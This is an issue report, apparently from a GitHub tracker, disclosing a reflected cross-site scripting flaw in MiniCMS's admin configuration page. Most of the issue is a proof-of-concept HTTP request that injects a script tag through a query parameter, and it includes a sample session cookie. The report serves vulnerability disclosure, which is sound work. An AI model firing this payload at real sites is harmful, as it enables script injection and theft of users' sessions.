This is a reflective XSS vulnerability that will lead to phishing attacks.
harry1080 opened this issue · 0 comments
harry1080 commented
This is a reflective XSS vulnerability that will lead to phishing attacks.
poc:
GET /MiniCMS-master/MiniCMS-master/mc-admin/conf.php?[payload] HTTP/1.1
Host: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://127.0.0.1/MiniCMS-master/MiniCMS-master/mc-admin/page.php
Cookie: mc_token=c30807e6587ade285ba7ade9f881b3d7; lang=3f81c1cb88c4e6355b4f5f02b32b4bdf8a9479da%7Een
payload=oz76w"><script>alert(1)</script>jqpj5=1
screenshot
1.
2.
